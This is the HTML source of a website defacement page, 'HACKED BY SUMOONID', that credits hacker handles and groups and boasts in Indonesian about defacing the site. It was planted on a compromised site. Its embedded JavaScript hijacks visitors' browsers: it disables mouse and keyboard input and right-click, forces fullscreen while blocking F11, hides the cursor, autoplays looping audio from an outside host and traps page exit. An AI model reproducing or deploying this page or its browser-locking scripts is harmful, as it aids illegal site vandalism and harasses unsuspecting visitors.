<html>
<head>
<title>
HACKED BY SUMOONID 
</title>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="googlebot" content="all,index,follow">
<meta name="allow-search" content="yes">
<meta name="audience" content="all">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="title" content="HACKED BY MR.M05T3R">
<meta name="description" content="CYBER LATION">
<meta name="keywords" content="MR.M05T3R, SUMOONID">
<meta name="robots" content="index, follow">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="language" content="English">
<meta name="revisit-after" content="600 days">
<meta property="og:image" content="https://i.ibb.co/hMZ1K83/cyber.jpg">
<meta name="theme-color" content="#000">
<style type="text/css">
body,a:hover{cursor:url(http://cur.cursors-4u.net/symbols/sym-1/sym46.cur),progress!important;}
</style>
<link rel="stylesheet" href="https://bit.ly/2UGCIC5">
</head>
<body bgcolor="black" text="white" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" onclick="document.getElementById(`lagu`).play();fs()" id="body">
<style type="text/css">
    center {

        font-family: Courier;

    }

    img {

        opacity: 80%

    }

    red {

        color: red;

    }

    #background-video {

        height: 100vh;

        width: 100vw;

        object-fit: cover;

        position: fixed;

        left: 0;

        right: 0;

        top: 0;

        bottom: 0;

        z-index: -1;

    }

    font {

        text-shadow: #000 0px 0px 3px;

        -webkit-font-smoothing: antialiased;

    }


</style>
<script language="JavaScript">
    window.onbeforeunload = confirmExit;

    function confirmExit() {

        return "are you sure ? wkwk";

    }

    function fs(){

    var elem = document.documentElement;

    if (elem.requestFullscreen) {

      elem.requestFullscreen();

    } else if (elem.msRequestFullscreen) {

      elem.msRequestFullscreen();

    } else if (elem.mozRequestFullScreen) {

      elem.mozRequestFullScreen();

    } else if (elem.webkitRequestFullscreen) {

      elem.webkitRequestFullscreen();

    }

    document.getElementById("body").style.cursor = `none`;

    document.onkeydown = function (e) {

        return false;

    }

    document.addEventListener("keydown", e =>
 {

    if(e.key == "F11") e.preventDefault();

    });

}


</script>
<audio src="https://f.top4top.io/m_29341sok60.mp3" autoplay="autoplay" loop="loop" id="lagu">
</audio>
<source src="https://f.top4top.io/m_29341sok60.mp3" loop="loop" type="audio/mp3">
<table width="100%" height="80%">
<tbody>
<tr>
<td>
<center>
<br>
HACKED BY 
<red>
SUMOONID
</red>
<red>
</red>
<br>


<img src="https://i.ibb.co/hMZ1K83/cyber.jpg" width="220" height="150" loading="lazy" onerror="this.style.display = `none`">


<br>

<b>

<red>
CYBER LATION TO CYBER CRIMINAL DEFACE
</red>

<br>

<br>

<font size="2">
NEWBIE CYBER SECURITY - NOVGREY - SURABAYAXPLOIT
<br>

</font>

<br>


<br>

<small>

<font size="1" color="white">
</font>

</small>


<div class="footer-greetings">

<marquee>

<font size="2">

</b>
Kami Ada KarenaKami Diperlukan, Selamat Datang Di Deface Saya.

</font>


</marquee>


</div>

 
</b>

</center>

</td>


</tr>

</tbody>

</table>


<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script data-cfasync="false" src="obitohaxor@gmail.com?subject=cyka blyat">

</script>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
   $(document).ready(function(){      
    $('body').find('img[src$="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png"]').remove();
   }); 
</script>

</body>

</html>
